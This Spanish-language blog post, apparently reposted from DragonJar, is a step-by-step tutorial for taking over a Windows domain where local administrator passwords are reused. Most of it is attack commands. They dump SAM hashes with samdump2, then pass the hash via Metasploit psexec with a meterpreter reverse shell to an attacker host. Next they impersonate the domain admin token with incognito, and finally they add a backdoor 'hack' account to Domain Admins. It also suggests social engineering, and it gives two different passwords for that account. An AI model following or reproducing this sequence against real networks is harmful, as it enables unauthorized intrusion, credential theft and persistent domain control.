Los “dominios” en windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupación lógica de servidores de red y otros ordenadores, para compartir información común sobre cuentas y seguridad, pero es una practica muy común (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de windows.
En el siguiente video vamos a ver como tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:
REQUISITOS
- Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
- Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
- Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
- Una copia de BackTrack 4
Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:
Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:
- mount /dev/sda1 /mnt/sda1
Montamos la particion de la maquina windows - cd /mnt/sda1/WINDOWS/system32/config
accedemos a la carpeta dodne se encuentra el archivo SAM - samdump2 system SAM
sacamos los hash de los usuarios en la maquina windows - msfconsole
ejecutamos el metasploit por consola - use windows/smb/psexec
utilizamos el psexec - exploit -p windows/meterpreter/reverse_tcp -o
utilizamos la shell meterpreter - LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
configuramos las opciones del exploit - sessions -i 1
una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra - use incognito
utilizamos el modulo incognito de meterpreter - list_tokens -u
mostramos los tokens - impersonate_token mydomain\domainadmin
tomamos las credenciales del administrador de dominio - execute -f cmd.exe -i -t
lanzamos la consola de windows - net user hack MPass5678 /add /domain
Agregamos el usuario “hack” con clave “MPass46782″ al dominio - net group “Domain Admins” hack /add /domain
metemos el usuario hack al grupo de administradores de dominio - Ya hemos tomado el control del dominio de windows
Este ataque es compatible con WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.
Via: DragonJar